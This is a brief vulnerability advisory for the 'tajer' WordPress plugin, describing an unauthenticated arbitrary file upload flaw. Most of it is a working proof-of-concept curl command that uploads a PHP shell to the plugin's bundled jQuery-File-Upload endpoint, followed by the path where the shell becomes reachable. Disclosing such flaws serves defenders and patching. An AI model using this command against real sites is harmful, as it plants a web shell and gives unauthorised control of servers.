The tajer WordPress plugin was affected by an Unauthenticated Arbitrary File Upload security vulnerability.
curl -F “[email protected]” http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php Shell is uploaded to: http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/shell.php